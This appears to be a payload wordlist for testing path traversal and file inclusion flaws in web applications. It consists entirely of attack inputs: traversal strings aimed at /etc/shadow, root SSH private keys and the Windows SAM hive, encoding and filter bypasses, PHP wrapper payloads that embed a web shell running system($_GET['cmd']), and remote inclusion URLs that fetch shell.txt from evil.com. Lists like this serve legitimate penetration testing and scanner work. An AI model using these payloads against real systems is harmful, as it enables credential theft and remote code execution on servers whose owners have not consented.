# Path Traversal / Directory Traversal Payloads
# For testing Local File Inclusion (LFI) vulnerabilities

# ===== Basic Traversal =====
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../../../

# ===== Unix/Linux Files =====
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../etc/shadow
../../../etc/hosts
../../../etc/hostname
../../../etc/issue
../../../etc/group
../../../etc/motd
../../../etc/mysql/my.cnf
../../../etc/httpd/conf/httpd.conf
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/fd/0
../../../proc/self/fd/1
../../../proc/self/fd/2
../../../proc/version
../../../proc/net/tcp
../../../proc/net/udp
../../../proc/sched_debug
../../../root/.bash_history
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../home/*/.bash_history
../../../home/*/.ssh/id_rsa

# ===== Windows Files =====
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\win.ini
..\..\..\windows\system32\config\sam
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\security
..\..\..\boot.ini
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\repair\sam
..\..\..\windows\repair\system
..\..\..\inetpub\logs\logfiles
..\..\..\inetpub\wwwroot\web.config
..\..\..\program files\apache group\apache\conf\httpd.conf

# ===== Encoding Bypass =====
..%2f
..%2F
%2e%2e%2f
%2e%2e/
..%5c
..%5C
%2e%2e%5c
%2e%2e\
..%252f
..%255c
%252e%252e%252f
..%c0%af
..%c1%9c
..%c0%9v
..%bg%qf
%c0%ae%c0%ae%c0%af
..%25%35%63
..%25%32%66

# ===== Double Encoding =====
%252e%252e%252f
%252e%252e/
..%252f..%252f
%252e%252e%255c

# ===== Unicode/UTF-8 Encoding =====
..%c0%af
..%c1%9c
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af
..%ef%bc%8f
..／
..＼

# ===== Null Byte Injection =====
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd%00.html
../../../etc/passwd\0
../../../etc/passwd\x00
../../../etc/passwd%2500

# ===== Filter Bypass =====
....//
....\/
....\\
..../
....\/....\/
....//....//
..;/
..;/..;/
...\.\.\
.../
..../
.....//
....;/
/..;/..;/
\..\.\..\.

# ===== Absolute Path =====
/etc/passwd
/etc/shadow
/etc/hosts
/var/log/auth.log
/proc/self/environ
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\boot.ini

# ===== Wrapper Protocols (PHP) =====
php://filter/convert.base64-encode/resource=../../../etc/passwd
php://filter/read=convert.base64-encode/resource=index.php
php://input
php://stdin
php://memory
php://temp
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
expect://id
expect://ls
phar://test.phar/test.txt
zip://test.zip#test.txt

# ===== Remote File Inclusion =====
http://evil.com/shell.txt
http://evil.com/shell.txt%00
https://evil.com/shell.txt
ftp://evil.com/shell.txt
//evil.com/shell.txt
